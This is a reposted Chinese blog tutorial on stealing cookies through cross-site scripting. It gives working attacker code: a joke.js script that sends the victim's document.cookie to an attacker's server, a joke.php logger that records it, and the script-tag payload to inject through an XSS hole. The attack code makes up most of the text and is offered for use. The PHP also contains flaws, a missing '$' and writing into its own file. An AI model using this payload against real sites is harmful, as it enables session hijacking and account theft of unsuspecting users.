码上快乐

相关内容   简体   繁体

XSS获取cookie

本文转载自  查看原文  2016-11-19 23:50  3323 

在你服务器的html目录下创建joke文件夹;

在joke文件夹中创建joke.js 和joke.php

 

joke.js 创建img标签,将它的src属性指向另一个脚本joke.php,这里关键的一点是:将页面的cookie作为参数附加到url后面

joke.js代码如下:

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://ip/joke/joke.php?joke='+encodeURIComponent(document.cookie);

 

 

joke.php解析请求里面的joke参数(即用户的cookie),然后保存起来

joke.php代码如下:

<?php
    @ini_set('display_errors',1);
    $str = $_GET['joke'];
    $filePath = "joke.php";

    if(is_writable($filePath)==false){
         echo "can't write";
    }else{
          $handler = fopen(filePath, "a");
          fwrite($handler, $str);
          fclose($handler);
    }
?>

 

找到XSS漏洞后,输入如下内容:

<script src="http://ip/joke/joke.js"></script>

#ip为你的服务器ip

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 XSS获取cookie并利用 XSS劫持cookie登录 XSS攻击之窃取Cookie Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录 pikachu--XSS(案例一:cookie的窃取和利用) JavaScript设置和获取cookie postman之如何获取cookie Cefsharp 获取源码和cookie JSP获取Cookie对象 js获取cookie
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM